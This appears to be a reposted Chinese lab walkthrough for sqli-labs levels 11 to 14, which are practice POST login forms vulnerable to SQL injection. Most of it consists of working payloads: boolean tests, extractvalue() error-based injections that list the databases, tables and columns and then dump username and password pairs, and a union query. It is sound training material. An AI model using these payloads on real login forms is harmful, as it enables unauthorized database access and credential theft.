标签：20 extractvalue uname admin 0x7e submit labs sqli passwd

less-11

本关还可以使用union联合查询注入和盲注

（1）使用burpsuite抓包，修改参数构造payload。

输入uname=admin' and 1=1--+&passwd=admin&submit=Submit

 

 

 可以登录

（2）输入uname=admin' and 1=2--+&passwd=admin&submit=Submit

 

 

 

发现无法登录，说明注入有效，存在报错型注入，接下来又是重复性的工作，上extractvalue()

（3）爆库

uname=admin' and extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)))--+&passwd=admin&submit=Submit     //通过不断改变limit x,1中x的值就可以爆出数据库中所以的库

 

 

 

 （4）查看当前数据库

uname=admin' and extractvalue(1,concat(0x7e,(select database())))--+&passwd=admin&submit=Submit

 

 

 

 （5）爆表

uname=admin' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)))--+&passwd=admin&submit=Submit

 

 

 

（6）爆列

uname=admin' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1)))--+&passwd=admin&submit=Submit

 

 

 

 （7）爆数据

uname=admin' and extractvalue(1,concat(0x7e,(select concat(username,0x7e,password) from users limit 0,1)))--+&passwd=admin&submit=Submit

 

 

 

 less-12

1、union联合查询注入

和less-11差不多，改一下闭合方式即可。使用双引号和括号进行闭合

uname=0") union select database(),user()--+&passwd=admin&submit=Submit

 

 

 2、报错注入

报错注入和less-11不太一样。查看源码

 

 

（1）可以看到sql查询语句语句：@sql="SELECT username,password FROM users WHERE username=($uname) and password=($password) LIMIT 0,1"；构造一个能闭合语句而且会报错的payload：admin" and extractvalue(1,concat(0x7e,(select database()))) and "

（2）最终admin="admin" and extractvalue(1,concat(0x7e,(select database()))) and " "

　　　　传入后就变成了：@sql="SELECT username,password FROM users WHERE username="admin" and extractvalue(1,concat(0x7e,(select database()))) and " " and password=($passwd) LIMIT 0,1";

　　　　前闭合，中间查询，后面报错，应该是没有问题的这样可以回显：uname=admin" and " &passwd=123456&submit=Submit

 

 

 （3）使用extractvalue进行报错注入。

uname=admin" and extractvalue(1,concat(0x7e,database())) and " &passwd=123456&submit=Submit

 

 

后面老一套就不再重复了

less-13

登录之后发现没有回显信息，所以union联合注入行不通了，只能通过报错注入和盲注

 

 1、报错注入

uname=admin') and extractvalue(1,concat(0x7e,database())) and ('&passwd=123456&submit=Submit

 

 

 后面过程和前面一样

less-14

 

标签：20,extractvalue,uname,admin,0x7e,submit,labs,sqli,passwd
来源： https://www.cnblogs.com/pursue-security/p/15362120.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。